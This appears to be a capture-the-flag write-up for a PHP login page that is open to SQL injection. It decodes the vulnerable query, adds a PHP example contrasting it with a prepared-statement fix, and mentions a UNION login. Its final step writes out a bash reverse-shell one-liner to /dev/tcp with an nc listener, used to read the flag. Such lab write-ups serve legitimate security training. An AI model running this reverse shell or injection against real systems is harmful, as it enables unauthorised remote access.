0. Open the web page and view the prompt
Tip: hint: union, command execution
1. Use Burp Suite to capture the request and send it to Repeater
2. Base64-decode the tip content:
$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){}
This tells us that a login must satisfy two conditions: first, the query must return a non-empty row; second, the password column of that row must equal md5() of the entered password.
3. Use a UNION query to log in
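The login check decoded above beside a hardened form, as an added example that is not from the original writeup or the challenge's code; it assumes an in-memory SQLite table standing in for the challenge's admin table and a constructed sample account.

```php
<?php
// Added example, not the challenge's code: the login check from the tip
// beside a hardened version. An in-memory SQLite table stands in for the
// challenge's MySQL admin table (assumption) so the script runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE admin (username TEXT PRIMARY KEY, password TEXT)');
// Constructed sample account, stored as a salted password_hash() value.
$pdo->prepare('INSERT INTO admin (username, password) VALUES (?, ?)')
    ->execute(['admin', password_hash('sample-pass-123', PASSWORD_DEFAULT)]);

// Vulnerable shape from the tip. $username is concatenated into the SQL, so
// whoever controls it controls which row (and which password value) the
// query returns; the check then compares that value with an unsalted md5.
function loginVulnerable(PDO $pdo, string $username, string $password): bool
{
    $sql = "SELECT username,password FROM admin WHERE username='" . $username . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return !empty($row) && $row['password'] === md5($password);
}

// Hardened shape: the username is bound as a parameter, so it is data, not
// SQL text, and the stored hash is checked with password_verify() in
// constant time instead of === md5().
function loginSafe(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT username, password FROM admin WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['password']);
}

// A single quote in the username reaches the SQL parser in the vulnerable
// version (a syntax error here, attacker-chosen rows in the real challenge).
try {
    loginVulnerable($pdo, "admin'", 'x');
} catch (PDOException $e) {
    echo "vulnerable query broke on a quote: ", $e->getMessage(), "\n";
}

// The safe version accepts the real password, rejects a wrong one, and treats
// the quoted username as a plain string that matches no row.
var_dump(loginSafe($pdo, 'admin', 'sample-pass-123'));
var_dump(loginSafe($pdo, 'admin', 'wrong'));
var_dump(loginSafe($pdo, "admin'", 'sample-pass-123'));
```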
4. Construct the payload and get the flag
I looked at some writeups, and some used Python scripts for brute-forcing. The output of the command execution was too messy and I couldn't make anything of it. In the end, I used a reverse shell.
A reverse shell needs an IP address the target can reach back to. Here we assume a public IP of 192.168.10.130; in an offline competition on a LAN, a LAN address works just as well.
Enter `bash -i >& /dev/tcp/192.168.10.130/8888 0>&1` and execute it, then run `nc -lvp 8888` on Kali. Once the connection comes back, locate the flag file and read the flag.